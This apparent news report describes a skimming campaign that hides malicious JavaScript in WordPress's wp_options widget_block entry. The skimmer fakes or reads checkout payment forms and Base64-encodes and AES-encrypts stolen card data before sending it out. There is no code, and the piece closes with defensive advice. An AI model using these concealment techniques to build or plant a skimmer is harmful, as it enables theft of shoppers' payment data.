A sophisticated new credit card skimming campaign targeting WordPress e-commerce sites has been uncovered by cybersecurity researchers. The malware stealthily injects malicious code into WordPress database tables to steal payment information from unsuspecting customers.
The skimmer operates by embedding itself into the WordPress wp_options table under "widget_block," allowing it to avoid detection by security scanning tools. The malicious JavaScript is inserted through the WordPress admin panel's HTML block widget system.
When activated, the skimmer checks if a user is on a checkout page before launching its attack. It either creates a fake payment form mimicking legitimate processors like Stripe or captures data entered into real payment fields. The malware collects credit card numbers, expiration dates, CVV codes, and billing details.
To hide the stolen information, the skimmer employs multiple layers of encryption and encoding before sending it to hacker-controlled servers. The data is first Base64-encoded and then encrypted using AES-CBC to appear innocuous and resist analysis.
This attack represents an evolution in skimming techniques, as the malware's ability to hide within legitimate database tables makes it particularly difficult to detect. Website owners are advised to regularly monitor their WordPress installations for suspicious database entries and unauthorized widget modifications.
The campaign follows similar recent attacks that used JavaScript malware to create counterfeit payment forms on e-commerce sites. These ongoing threats highlight the need for enhanced security measures on WordPress-based online stores.